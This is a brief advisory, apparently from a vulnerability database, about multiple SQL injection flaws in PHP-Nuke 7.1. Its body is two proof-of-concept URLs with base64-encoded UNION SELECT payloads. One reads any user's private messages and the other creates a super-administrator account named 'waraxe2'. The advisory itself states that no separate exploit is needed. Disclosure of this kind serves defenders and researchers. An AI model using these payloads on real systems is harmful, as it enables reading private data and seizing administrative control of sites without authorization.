PHP-Nuke Multiple SQL Injection Vulnerabilities

PHP-Nuke Multiple SQL Injection Vulnerabilities

No exploit is required to leverage this issue. The following proof of concept has been provided:

To read arbitrary users private messages:
http://www.example.com/nuke71/modules.php?name=Private_Messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox

To create an arbitrary administrator account with username "waraxe2" and password "coolpass":
http://www.example.com/nuke71/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox